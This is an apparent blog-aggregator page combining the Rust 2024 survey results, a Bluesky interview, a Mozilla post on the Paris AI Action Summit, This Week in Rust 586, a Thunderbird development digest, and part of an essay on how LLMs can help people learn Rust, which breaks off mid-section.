Our sincerest thanks to every community member who took the time to express their opinions and experiences with Rust over the past year. Your participation will help us make Rust better for everyone.

There's a lot of data to go through, so strap in and enjoy!

Participation

Survey Started Completed Completion rate Views
2023 11 950 9 710 82.2% 16 028
2024 9 450 7 310 77.4% 13 564

As shown above, in 2024, we have received fewer survey views than in the previous year. This was likely caused simply by the fact that the survey ran only for two weeks, while in the previous year it ran for almost a month. However, the completion rate has also dropped, which seems to suggest that the survey might be a bit too long. We will take this into consideration for the next edition of the survey.

Community

The State of Rust survey not only gives us excellent insight into how many Rust users around the world are using and experiencing the language but also gives us insight into the makeup of our global community. This information gives us a sense of where the language is being used and where access gaps might exist for us to address over time. We hope that this data and our related analysis help further important discussions about how we can continue to prioritize global access and inclusivity in the Rust community.

Same as every year, we asked our respondents in which country they live in. The top 10 countries represented were, in order: United States (22%), Germany (14%), United Kingdom (6%), France (6%), China (5%), Canada (3%), Netherlands (3%), Russia (3%), Australia (2%), and Sweden (2%). We are happy to see that Rust is enjoyed by users from all around the world! You can try to find your country in the chart below:

We also asked whether respondents consider themselves members of a marginalized community. Out of those who answered, 74.5% selected no, 15.5% selected yes, and 10% preferred not to say.

We have asked the group that selected “yes” which specific groups they identified as being a member of. The majority of those who consider themselves a member of an underrepresented or marginalized group in technology identify as lesbian, gay, bisexual, or otherwise non-heterosexual. The second most selected option was neurodivergent at 46% followed by trans at 35%.

<noscript> <img alt="which-marginalized-group" height="500" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/which-marginalized-group.png" /> </noscript>
[PNG] [SVG]

Each year, we must acknowledge the diversity, equity, and inclusivity (DEI) related gaps in the Rust community and open source as a whole. We believe that excellent work is underway at the Rust Foundation to advance global access to Rust community gatherings and distribute grants to a diverse pool of maintainers each cycle, which you can learn more about here. Even so, global inclusion and access is just one element of DEI, and the survey working group will continue to advocate for progress in this domain.

Rust usage

The number of respondents that self-identify as a Rust user was quite similar to last year, around 92%. This high number is not surprising, since we primarily target existing Rust developers with this survey.

Similarly as last year, around 31% of those who did not identify as Rust users cited the perception of difficulty as the primary reason for not using Rust. The most common reason for not using Rust was that the respondents simply haven’t had the chance to try it yet.

<noscript> <img alt="why-dont-you-use-rust" height="500" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/why-dont-you-use-rust.png" /> </noscript>

Of the former Rust users who participated in the 2024 survey, 36% cited factors outside their control as a reason why they no longer use Rust, which is a 10pp decrease from last year. This year, we also asked respondents if they would consider using Rust again if an opportunity comes up, which turns out to be true for a large fraction of the respondents (63%). That is good to hear!

<noscript> <img alt="why-did-you-stop-using-rust" height="500" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/why-did-you-stop-using-rust.png" /> </noscript>

Closed answers marked with N/A were not present in the previous version(s) of the survey.

Those not using Rust anymore told us that it is because they don't really need it (or the goals of their company changed) or because it was not the right tool for the job. A few reported being overwhelmed by the language or its ecosystem in general or that switching to or introducing Rust would have been too expensive in terms of human effort.

Of those who used Rust in 2024, 53% did so on a daily (or nearly daily) basis — an increase of 4pp from the previous year. We can observe an upward trend in the frequency of Rust usage over the past few years, which suggests that Rust is being increasingly used at work. This is also confirmed by other answers mentioned in the Rust at Work section later below.

<noscript> <img alt="how-often-do-you-use-rust" height="300" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/how-often-do-you-use-rust.png" /> </noscript>
[PNG] [SVG]

Rust expertise is also continually increasing amongst our respondents! 20% of respondents can write (only) simple programs in Rust (a decrease of 3pp from 2023), while 53% consider themselves productive using Rust — up from 47% in 2023. While the survey is just one tool to measure the changes in Rust expertise overall, these numbers are heartening as they represent knowledge growth for many Rustaceans returning to the survey year over year.

<noscript> <img alt="how-would-you-rate-your-rust-expertise" height="500" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/how-would-you-rate-your-rust-expertise.png" /> </noscript>
[PNG] [SVG]

Unsurprisingly, the most popular version of Rust is latest stable, either the most recent one or whichever comes with the users' Linux distribution. Almost a third of users also use the latest nightly release, due to various reasons (see below). However, it seems that the beta toolchain is not used much, which is a bit unfortunate. We would like to encourage Rust users to use the beta toolchain more (e.g. in CI environments) to help test soon-to-be stabilized versions of Rust.

<noscript> <img alt="which-version-of-rust-do-you-use" height="500" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/which-version-of-rust-do-you-use.png" /> </noscript>

People that use the nightly toolchain mostly do it to gain access to specific unstable language features. Several users have also mentioned that rustfmt works better for them on nightly or that they use the nightly compiler because of faster compilation times.

<noscript> <img alt="if-you-use-nightly-why" height="500" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/if-you-use-nightly-why.png" /> </noscript>

Learning Rust

To use Rust, programmers first have to learn it, so we are always interested in finding out how do they approach that. Based on the survey results, it seems that most users learn from Rust documentation and also from The Rust Programming Language book, which has been a favourite learning resource of new Rustaceans for a long time. Many people also seem to learn by reading the source code of Rust crates. The fact that both the documentation and source code of tens of thousands of Rust crates is available on docs.rs and GitHub makes this easier.

<noscript> <img alt="what-kind-of-learning-materials-have-you-consumed" height="500" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/what-kind-of-learning-materials-have-you-consumed.png" /> </noscript>

In terms of answers belonging to the "Other" category, they can be clustered into three categories: people using LLM (large language model) assistants (Copilot, ChatGPT, Claude, etc.), reading the official Rust forums (Discord, URLO) or being mentored while contributing to Rust projects. We would like to extend a big thank you to those making our spaces friendly and welcoming for newcomers, as it is important work and it pays off. Interestingly, a non-trivial number of people "learned by doing" and used rustc error messages and clippy as a guide, which is a good indicator of the quality of Rust diagnostics.

In terms of formal education, it seems that Rust has not yet penetrated university curriculums, as this is typically a very slowly moving area. Only a very small number of respondents (around 3%) have taken a university Rust course or used university learning materials.

<noscript> <img alt="have-you-taken-a-rust-course" height="400" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/have-you-taken-a-rust-course.png" /> </noscript>
[PNG] [SVG]

Programming environment

In terms of operating systems used by Rustaceans, Linux was the most popular choice, and it seems that it is getting increasingly popular year after year. It is followed by macOS and Windows, which have a very similar share of usage.

As you can see in the wordcloud, there are also a few users that prefer Arch, btw.

Rust programmers target a diverse set of platforms with their Rust programs. We saw a slight uptick in users targeting embedded and mobile platforms, but otherwise the distribution of platforms stayed mostly the same as last year. Since the WebAssembly target is quite diverse, we have split it into two separate categories this time. Based on the results it is clear that when using WebAssembly, it is mostly in the context of browsers (23%) rather than other use-cases (7%).

<noscript> <img alt="which-os-do-you-target" height="500" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/which-os-do-you-target.png" /> </noscript>

We cannot of course forget the favourite topic of many programmers: which IDE (developer environment) they use. Although Visual Studio Code still remains the most popular option, its share has dropped by 5pp this year. On the other hand, the Zed editor seems to have gained considerable traction recently. The small percentage of those who selected "Other" are using a wide range of different tools: from CursorAI to classics like Kate or Notepad++. Special mention to the 3 people using "ed", that's quite an achievement.

<noscript> <img alt="what-ide-do-you-use" height="500" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/what-ide-do-you-use.png" /> </noscript>

You can also take a look at the linked wordcloud that summarizes open answers to this question (the "Other" category), to see what other editors are also popular.

Rust at Work

We were excited to see that more and more people use Rust at work for the majority of their coding, 38% vs 34% from last year. There is a clear upward trend in this metric over the past few years.

The usage of Rust within companies also seems to be rising, as 45% of respondents answered that their organisation makes non-trivial use of Rust, which is a 7pp increase from 2023.

<noscript> <img alt="how-is-rust-used-at-your-organization" height="600" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/how-is-rust-used-at-your-organization.png" /> </noscript>
[PNG] [SVG]

Once again, the top reason employers of our survey respondents invested in Rust was the ability to build relatively correct and bug-free software. The second most popular reason was Rust’s performance characteristics. 21% of respondents that use Rust at work do so because they already know it, and it's thus their default choice, an uptick of 5pp from 2023. This seems to suggest that Rust is becoming one of the baseline languages of choice for more and more companies.

<noscript> <img alt="why-you-use-rust-at-work" height="500" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/why-you-use-rust-at-work.png" /> </noscript>
[PNG] [SVG]

Similarly to the previous year, a large percentage of respondents (82%) report that Rust helped their company achieve its goals. In general, it seems that programmers and companies are quite happy with their usage of Rust, which is great!

<noscript> <img alt="which-statements-apply-to-rust-at-work" height="500" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/which-statements-apply-to-rust-at-work.png" /> </noscript>
[PNG] [SVG]

In terms of technology domains, the situation is quite similar to the previous year. Rust seems to be especially popular for creating server backends, web and networking services and cloud technologies. It also seems to be gaining more traction for embedded use-cases.

<noscript> <img alt="technology-domain" height="600" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/technology-domain.png" /> </noscript>

You can scroll the chart to the right to see more domains. Note that the Automotive domain was not offered as a closed answer in the 2023 survey (it was merely entered through open answers), which might explain the large jump.

It is exciting to see the continued growth of professional Rust usage and the confidence so many users feel in its performance, control, security and safety, enjoyability, and more!

Challenges

As always, one of the main goals of the State of Rust survey is to shed light on challenges, concerns, and priorities on Rustaceans’ minds over the past year.

We have asked our users about aspects of Rust that limit their productivity. Perhaps unsurprisingly, slow compilation was at the top of the list, as it seems to be a perennial concern of Rust users. As always, there are efforts underway to improve the speed of the compiler, such as enabling the parallel frontend or switching to a faster linker by default. We invite you to test these improvements and let us know if you encounter any issues.

Other challenges included subpar support for debugging Rust and high disk usage of Rust compiler artifacts. On the other hand, most Rust users seem to be very happy with its runtime performance, the correctness and stability of the compiler and also Rust's documentation.

<noscript> <img alt="which-problems-limit-your-productivity" height="600" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/which-problems-limit-your-productivity.png" /> </noscript>

In terms of specific unstable (or missing) features that Rust users want to be stabilized (or implemented), the most desired ones were async closures and if/let while chains. Well, we have good news! Async closures will be stabilized in the next version of Rust (1.85), and if/let while chains will hopefully follow soon after, once Edition 2024 is released (which will also happen in Rust 1.85).

Other coveted features are generators (both sync and async) and more powerful generic const expressions. You can follow the Rust Project Goals to track the progress of these (and other) features.

<noscript> <img alt="which-features-do-you-want-stabilized" height="600" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/which-features-do-you-want-stabilized.png" /> </noscript>

In the open answers to this question, people were really helpful and tried hard to describe the most notable issues limiting their productivity. We have seen mentions of struggles with async programming (an all-time favourite), debuggability of errors (which people generally love, but they are not perfect for everyone) or Rust tooling being slow or resource intensive (rust-analyzer and rustfmt). Some users also want a better IDE story and improved interoperability with other languages.

This year, we have also included a new question about the speed of Rust's evolution. While most people seem to be content with the status quo, more than a quarter of people who responded to this question would like Rust to stabilize and/or add features more quickly, and only 7% of respondents would prefer Rust to slow down or completely stop adding new features.

<noscript> <img alt="what-do-you-think-about-rust-evolution" height="500" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/what-do-you-think-about-rust-evolution.png" /> </noscript>
[PNG] [SVG]

Interestingly, when we asked respondents about their main worries for the future of Rust, one of the top answers remained the worry that Rust will become too complex. This seems to be in contrast with the answers to the previous question. Perhaps Rust users still seem to consider the complexity of Rust to be manageable, but they worry that one day it might become too much.

We are happy to see that the amount of respondents concerned about Rust Project governance and lacking support of the Rust Foundation has dropped by about 6pp from 2023.

<noscript> <img alt="what-are-your-biggest-worries-about-rust" height="500" src="https://blog.rust-lang.org/images/2025-02-13-rust-survey-2024/what-are-your-biggest-worries-about-rust.png" /> </noscript>

Looking ahead

Each year, the results of the State of Rust survey help reveal the areas that need improvement in many areas across the Rust Project and ecosystem, as well as the aspects that are working well for our community.

If you have any suggestions for the Rust Annual survey, please let us know!

We are immensely grateful to those who participated in the 2024 State of Rust Survey and facilitated its creation. While there are always challenges associated with developing and maintaining a programming language, this year we were pleased to see a high level of survey participation and candid feedback that will truly help us make Rust work better for everyone.

If you’d like to dig into more details, we recommend you to browse through the full survey report.

Andrew HalberstadtUsing Jujutsu With Mozilla Unified

With Mozilla’s migration from hg.mozilla.org to Github drawing near, the clock is ticking for developers still using Mercurial to find their new workflow. I previously blogged about how Jujutsu can help here, so please check that post out first if you aren’t sure what Jujutsu is, or whether it’s right for you. If you know you want to give it a shot, read on for a tutorial on how to get everything set up!

We’ll start with an existing Mercurial clone of mozilla-unified, convert it to use git-cinnabar and then set up Jujutsu using the co-located repo method. Finally I’ll cover some tips and tricks for using some of the tooling that relies on version control.

The Mozilla BlogBluesky’s Emily Liu on rethinking social media (and why it’s time to chime in)

A smiling woman in a brown jacket stands on a busy city street, overlaid with a blue digital grid background and speech bubble icons.<figcaption class="wp-element-caption">Emily Liu is the head of special projects at Bluesky.</figcaption>

Here at Mozilla, we are the first to admit the internet isn’t perfect, but we know the internet is pretty darn magical. The internet opens up doors and opportunities, allows for human connection, and lets everyone find where they belong — their corners of the internet. We all have an internet story worth sharing. In My Corner Of The Internet, we talk with people about the online spaces they can’t get enough of, the sites and forums that shaped them, and how they would design their own corner of the web.

We caught up with Emily Liu, head of special projects at Bluesky, as the open-source platform celebrates its first year launching to the public (you can follow Firefox on Bluesky here). She talks about how social media has changed over the last decade, her love for public forums and how her path started with a glitter cursor. 

What is your favorite corner of the internet? 

I’m at the two extremes on the spectrum of private to public content: 

Firstly, I love a good iMessage group text, especially when it’s moving at 100 miles per hour. I strongly believe that everyone needs a good group chat.

At the same time, I love public web forums. This feels like something that’s increasingly rare on the internet as more of us move to private group apps, and I worry that this is equivalent to pulling the ladder up behind us for those who haven’t found those private spaces yet. So I try to do my part by chiming in on public forums when I can offer something useful.

What is the one tab you always regret closing?

I live by Google Calendar and have widgets for it on probably every digital surface — my desktop, my phone lock screen, my laptop side menu, and of course, multiple tabs simultaneously. If something’s not on my calendar, it’s probably not happening.

What can you not stop talking about on the internet right now?

I’m super excited about Bluesky. Obviously I’m unbiased (I work here). We launched the Bluesky app publicly in just February 2024, and under a year later, we crossed 30M people on the network. But the real measure of Bluesky’s growth is that my family has started sending me news articles and asking, “Hey, isn’t this where you work?”

Social networks have become vital public infrastructure, whether it’s to get the latest breaking news, find jobs and opportunities, or stay in touch with our friends and family. Yet over the last decade, closed networks have locked users in, preventing competition and innovation in social media as their services deteriorate. On the other hand, Bluesky is both a social app where your experience online is yours to customize, and an open network that reintroduces competition to social media. This also means that the social network isn’t defined by whoever the CEO is, however capricious they might be.

What was the first online community you engaged with?

In middle school, I ran an anonymous fashion blog on Tumblr. This was before Tumblr had group chats, so internet friends and I co-opted the product by creating a makeshift group DM — a private blog with multiple owners, where every message we sent was really just a post on a private blog. Where there is a will, there is a way, and people are infinitely creative; this is where I learned that the product you design may not be the product that users adopt.

Tumblr was also where I wrote my first lines of code out of desperation for a better blog theme than what the default marketplace provided. Who would’ve thought that adding a visitor counter and a glitter cursor would’ve led me to this point!

If you could create your own corner of the internet, what would it look like?

I feel lucky that in a sense, I am doing this right now through Bluesky. On one hand, there’s the Bluesky app itself. There’s still a bunch of low-hanging fruit to reach feature parity with other social networks, but on top of that, I’m excited about tweaks that might make social media less of a “torment nexus” that other apps haven’t tried yet. Maybe I shouldn’t share them here just yet since I know a certain other company likes to implement Bluesky’s ideas. 😉

And on the other hand, Bluesky is already so customizable that I can configure my experience to be what I want. For example, I’m a big fan of the Quiet Posters custom feed, which shows you posts from people you follow who don’t often post that much, giving you a cozier feel of the network.

What articles and/or videos are you waiting to read/watch right now?

I have so many open tabs and unread newsletters about China and AI that I need to get to.

What role do you see open web projects like Bluesky playing in shaping the future of the web?

I see Bluesky as just one contributor in the mission of building an open web — we’re not the first project to build an open social network, and we won’t be the last. The collaboration and constructive criticism from other players has been immensely useful. Recently, some independent groups have begun building alternative ATProto infrastructure, which I’m particularly excited about. (ATProto, or the AT Protocol, is the open standard that Bluesky is built upon.) Bluesky’s vision of a decentralized and open social web only comes to fruition when users actually have alternatives to choose from, so I’m rooting for all of these projects too.


Emily Liu is the head of special projects at Bluesky, an open social network that gives creators independence from platforms, developers the freedom to build, and users a choice in their experience. Previously, Emily built election models and visualizations at The Washington Post, archival tooling at The New York Times, and automated fact-checking at the Duke Reporters’ Lab.

The post Bluesky’s Emily Liu on rethinking social media (and why it’s time to chime in) appeared first on The Mozilla Blog.

The Mozilla BlogParis AI Action Summit: A milestone for open and Public AI

As we close out the Paris AI Action Summit, one thing is clear: the conversation around open and Public AI is evolving—and gaining real momentum. Just over a year ago at Bletchley Park, open source AI was framed as a risk. In Paris, we saw a major shift. There is now a growing recognition that openness isn’t just compatible with AI safety and advancing public interest AI—it’s essential to it.

We have been vocal supporters of an ecosystem grounded in open competition and trustworthy AI —one where innovation isn’t walled off by dominant players or concentrated in a single geography. Mozilla, therefore, came to this Summit with a clear and urgent message: AI must be open, human-centered, and built for the public good. And across discussions, that message resonated.

Open source AI is entering the conversation in a big way

Two particularly notable moments stood out:

  • European Commission President Ursula von der Leyen spoke about Europe’s “distinctive approach to AI,” emphasizing collaborative, open-source solutions as a path forward.
  • India’s Prime Minister Narendra Modi reinforced this vision, calling for open source AI systems to enhance trust and transparency, reduce bias, and democratize technology.

These aren’t just words. The investments and initiatives announced at this Summit mark a real turning point. From the launch of Current AI, an initial $400M public interest AI partnership supporting open source development, to ROOST, a new nonprofit making AI safety tools open and accessible, to the €109 billion investment in AI computing infrastructure announced by President Macron, the momentum is clear. Add to that strong signals from the EU and India, and this Summit stands out as one of the most positive and proactive international gatherings on AI so far.

At the heart of this is Public AI—the idea that we need infrastructure beyond private, purely profit-driven AI. That means building AI that serves society and promotes true innovation even when it doesn’t fit neatly into short-term business incentives. The conversations in Paris show that we’re making progress, but there’s more work to do.

Looking ahead to the next AI summit

Momentum is building, and we must forge onward. The next AI Summit in India will be a critical moment to review the progress on these announcements and ensure organizations like Mozilla—those fighting for open and Public AI infrastructure—have a seat at the table.

Mozilla is committed to turning this vision into reality—no longer a distant, abstract idea, but a movement already in motion.

A huge thanks to the organizers, partners, and global leaders driving this conversation forward. Let’s keep pushing for AI that serves humanity—not the other way around.

––Mitchell Baker
Chairwoman, Mozilla
Paris AI Action Summit Steering Committee Member

The post Paris AI Action Summit: A milestone for open and Public AI appeared first on The Mozilla Blog.

This Week In RustThis Week in Rust 586

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on X (formerly Twitter) or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub and archives can be viewed at this-week-in-rust.org. If you find any errors in this week's issue, please submit a PR.

Want TWIR in your inbox? Subscribe here.

Updates from Rust Community

Official
Foundation
Newsletters
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
FOSDEM
Miscellaneous

Crate of the Week

This week's crate is esp32-mender-client, a client for ESP32 to execute firmware updates and remote commands.

Thanks to Kelvin for the self-suggestion!

Please submit your suggestions and votes for next week!

Calls for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:

RFCs
  • No calls for testing were issued this week.
Rust
  • No calls for testing were issued this week.
Rustup
  • No calls for testing were issued this week.

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Call for Participation; projects and speakers

CFP - Projects

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

No Calls for participation were submitted this week.

If you are a Rust project owner and are looking for contributors, please submit tasks here or through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

CFP - Events

Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.

No Calls for papers or presentations were submitted this week.

If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

Updates from the Rust Project

462 pull requests were merged in the last week

Rust Compiler Performance Triage

A relatively neutral week, with lots of real changes but most small in magnitude. Most significant change is rustdoc's move of JS/CSS minification to build time which cut doc generation times on most benchmarks fairly significantly.

Triage done by @simulacrum. Revision range: 01e4f19c..c03c38d5

3 Regressions, 5 Improvements, 1 Mixed; 2 of them in rollups 32 artifact comparisons made in total

Full report here

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

  • No RFCs were approved this week.
Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs
Rust Cargo
  • No Cargo Tracking Issues or PRs entered Final Comment Period this week.
Language Team
  • No Language Team Proposals entered Final Comment Period this week.
Language Reference
  • No Language Reference RFCs entered Final Comment Period this week.
Unsafe Code Guidelines
  • No Unsafe Code Guideline Tracking Issues or PRs entered Final Comment Period this week.
New and Updated RFCs

Upcoming Events

Rusty Events between 2025-02-12 - 2025-03-12 🦀

Virtual
Asia
Europe
North America
Oceania

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

Just because things are useful doesn't mean they are magically sound.

Ralf Jung on github

Thanks to scottmcm for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, U007D, joelmarcey, mariannegoldin, bennyvasquez, bdillo

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

Mozilla ThunderbirdThunderbird Monthly Development Digest – January 2025

Hello again Thunderbird Community! As January drew to a close, the team was closing in on the completion of some important milestones. Additionally, we had scoped work for our main Q1 priorities. Those efforts are now underway and it feels great to cross things off the list and start tackling new challenges.

As always, you can catch up on all of our previous digests and updates.

FOSDEM – Inspiration, collaboration and education

A modest contingent from the Thunderbird team joined our Mozilla counterparts for an educational and inspiring weekend at Fosdem recently. We talked about standards, problems, solutions and everything in between. However, the most satisfying part of the weekend being standing at the Thunderbird booth and hearing the gratitude, suggestions and support from so many users.

With such important discussions among leading voices, we’re keen to help in finding or implementing solutions to some of the meatier topics such as:

  • OAuth 2.0 Dynamic Client Registration Protocol
  • Support for unicode email addresses
  • Support for OpenPGP certification authorities and trust delegation

Exchange Web Services support in Rust

With a reduction in team capacity for part of January, the team was able to complete work on the following tasks that form some of the final stages in our 0.2 release:

  • Folder compaction
  • Saving attachments to disk
  • Download EWS messages in an nsIChannel

Keep track of feature delivery here.

Account Hub

We completed the second and final milestone in the First Time User Experience for email configuration via the enhanced Account Hub over the course of January. Tasks included density and font awareness, refactoring of state management, OAuth prompts, enhanced error handling and more which can be followed via Meta bug & progress tracking. Watch out for this feature being unveiled in daily and beta in the coming weeks!

Global Message Database

With a significant number of the research and prototyping tasks now behind us, the project has taken shape over the course of January with milestones and tasks mapped out. Recent progress has been related to live view, sorting and support for Unicode server and folder names. 

Next up is to finally crack the problem of “non-unique unique IDs” mentioned previously, which is important preparatory groundwork required for a clean database migration. 

In-App Notifications

Phase 2 is now complete, and almost ready for uplift to ESR, pending underlying Firefox dependencies scheduled in early March. Features and user stories in the latest milestone include a cache-control mechanism, a thorough accessibility review, schema changes and the addition of guard rails to limit notification frequency. Meta Bug & progress tracking.

New Features Landing Soon

Several requested features and fixes have reached our Daily users and include…

To see things as they land, and help squash early bugs, you can check the pushlog and try running daily. This would be immensely helpful for catching things early.

Toby Pilling
Senior Manager, Desktop Engineering

The post Thunderbird Monthly Development Digest – January 2025 appeared first on The Thunderbird Blog.

Niko MatsakisHow I learned to stop worrying and love the LLM

I believe that AI-powered development tools can be a game changer for Rust—and vice versa. At its core, my argument is simple: AI’s ability to explain and diagnose problems with rich context can help people get over the initial bump of learning Rust in a way that canned diagnostics never could, no matter how hard we try. At the same time, rich type systems like Rust’s give AIs a lot to work with, which could be used to help them avoid hallucinations and validate their output. This post elaborates on this premise and sketches out some of the places where I think AI could be a powerful boost.

Perceived learning curve is challenge #1 for Rust

Is Rust good for every project? No, of course not. But it’s absolutely great for some things—specifically, building reliable, robust software that performs well at scale. This is no accident. Rust’s design is intended to surface important design questions (often in the form of type errors) and to give users the control to fix them in whatever way is best.

But this same strength is also Rust’s biggest challenge. Talking to people within Amazon about adopting Rust, perceived complexity and fear of its learning curve is the biggest hurdle. Most people will say, “Rust seems interesting, but I don’t need it for this problem”. And you know, they’re right! They don’t need it. But that doesn’t mean they wouldn’t benefit from it.

One of Rust’s big surprises is that, once you get used to it, it’s “surprisingly decent” at very large number of things beyond what it was designed for. Simple business logic and scripts can be very pleasant in Rust. But the phase “once you get used to it” in that sentence is key, since most people’s initial experience with Rust is confusion and frustration.

Rust likes to tell you no (but it’s for your own good)

Some languages are geared to say yes—that is, given any program, they aim to run it and do something. JavaScript is of course the most extreme example (no semicolons? no problem!) but every language does this to some degree. It’s often quite elegant. Consider how, in Python, you write vec[-1] to get the last element in the list: super handy!

Rust is not (usually) like this. Rust is geared to say no. The compiler is just itching for a reason to reject your program. It’s not that Rust is mean: Rust just wants your program to be as good as it can be. So we try to make sure that your program will do what you want (and not just what you asked for). This is why vec[-1], in Rust, will panic: sure, giving you the last element might be convenient, but how do we know you didn’t have an off-by-one bug that resulted in that negative index?1

But that tendency to say no means that early learning can be pretty frustrating. For most people, the reward from programming comes from seeing their program run—and with Rust, there’s a lot of niggling details to get right before your program will run. What’s worse, while those details are often motivated by deep properties of your program (like data races), the way they are presented is as the violation of obscure rules, and the solution (“add a *”) can feel random.

Once you get the hang of it, Rust feels great, but getting there can be a pain. I heard a great phrase from someone at Amazon to describe this: “Rust: the language where you get the hangover first”.3

AI today helps soften the learning curve

My favorite thing about working at Amazon is getting the chance to talk to developers early in their Rust journey. Lately I’ve noticed an increasing trend—most are using Q Developer. Over the last year, Amazon has been doing a lot of internal promotion of Q Developer, so that in and of itself is no surprise, but what did surprise me a bit is hearing from developers the way that they use it.

For most of them, the most valuable part of Q Dev is authoring code but rather explaining it. They ask it questions like “why does this function take an &T and not an Arc<T>?” or “what happens when I move a value from one place to another?”. Effectively, the LLM becomes an ever-present, ever-patient teacher.4

Scaling up the Rust expert

Some time back I sat down with an engineer learning Rust at Amazon. They asked me about an error they were getting that they didn’t understand. “The compiler is telling me something about ‘static, what does that mean?” Their code looked something like this:

async fn log_request_in_background(message: &str) {
    tokio::spawn(async move {
        log_request(message);
    });
}

And the compiler was telling them:

error[E0521]: borrowed data escapes outside of function
 --> src/lib.rs:2:5
  |
1 |   async fn log_request_in_background(message: &str) {
  |                                      -------  - let's call the lifetime of this reference `'1`
  |                                      |
  |                                      `message` is a reference that is only valid in the function body
2 | /     tokio::spawn(async move {
3 | |         log_request(message);
4 | |     });
  | |      ^
  | |      |
  | |______`message` escapes the function body here
  |        argument requires that `'1` must outlive `'static`

This is a pretty good error message! And yet it requires significant context to understand it (not to mention scrolling horizontally, sheesh). For example, what is “borrowed data”? What does it mean for said data to “escape”? What is a “lifetime” and what does it mean that “'1 must outlive 'static”? Even assuming you get the basic point of the message, what should you do about it?

The fix is easy… if you know what to do

Ultimately, the answer to the engineer’s problem was just to insert a call to clone5. But deciding on that fix requires a surprisingly large amount of context. In order to figure out the right next step, I first explained to the engineer that this confusing error is, in fact, what it feels like when Rust saves your bacon, and talked them through how the ownership model works and what it means to free memory. We then discussed why they were spawning a task in the first place (the answer: to avoid the latency of logging)—after all, the right fix might be to just not spawn at all, or to use something like rayon to block the function until the work is done.

Once we established that the task needed to run asynchronously from its parent, and hence had to own the data, we looked into changing the log_request_in_background function to take an Arc<String> so that it could avoid a deep clone. This would be more efficient, but only if the caller themselves could cache the Arc<String> somewhere. It turned out that the origin of this string was in another team’s code and that this code only returned an &str. Refactoring that code would probably be the best long term fix, but given that the strings were expected to be quite short, we opted to just clone the string.

You can learn a lot from a Rust error

An error message is often your first and best chance to teach somebody something.—Esteban Küber (paraphrased)

Working through this error was valuable. It gave me a chance to teach this engineer a number of concepts. I think it demonstrates a bit of Rust’s promise—the idea that learning Rust will make you a better programmer overall, regardless of whether you are using Rust or not.

Despite all the work we have put into our compiler error messages, this kind of detailed discussion is clearly something that we could never achieve. It’s not because we don’t want to! The original concept for --explain, for example, was to present a customized explanation of each error was tailored to the user’s code. But we could never figure out how to implement that.

And yet tailored, in-depth explanation is absolutely something an LLM could do. In fact, it’s something they already do, at least some of the time—though in my experience the existing code assistants don’t do nearly as good a job with Rust as they could.

What makes a good AI opportunity?

Emery Berger is a professor at UMass Amherst who has been exploring how LLMs can improve the software development experience. Emery emphasizes how AI can help close the gap from “tool to goal”. In short, today’s tools (error messages, debuggers, profilers) tell us things about our program, but they stop there. Except in simple cases, they can’t help us figure out what to do about it—and this is where AI comes in.

When I say AI, I am not talking (just) about chatbots. I am talking about programs that weave LLMs into the process, using them to make heuristic choices or proffer explanations and guidance to the user. Modern LLMs can also do more than just rely on their training and the prompt: they can be given access to APIs that let them query and get up-to-date data.

I think AI will be most useful in cases where solving the problem requires external context not available within the program itself. Think back to my explanation of the 'static error, where knowing the right answer depended on how easy/hard it would be to change other APIs.

Where I think Rust should leverage AI

I’ve thought about a lot of places I think AI could help make working in Rust more pleasant. Here is a selection.

Deciding whether to change the function body or its signature

Consider this code:

fn get_first_name(&self, alias: &str) -> &str {
    alias
}

This function will give a type error, because the signature (thanks to lifetime elision) promises to return a string borrowed from self but actually returns a string borrowed from alias. Now…what is the right fix? It’s very hard to tell in isolation! It may be that in fact the code was meant to be &self.name (in which case the current signature is correct). Or perhaps it was meant to be something that sometimes returns &self.name and sometimes returns alias, in which case the signature of the function was wrong. Today, we take our best guess. But AI could help us offer more nuanced guidance.

Translating idioms from one language to another

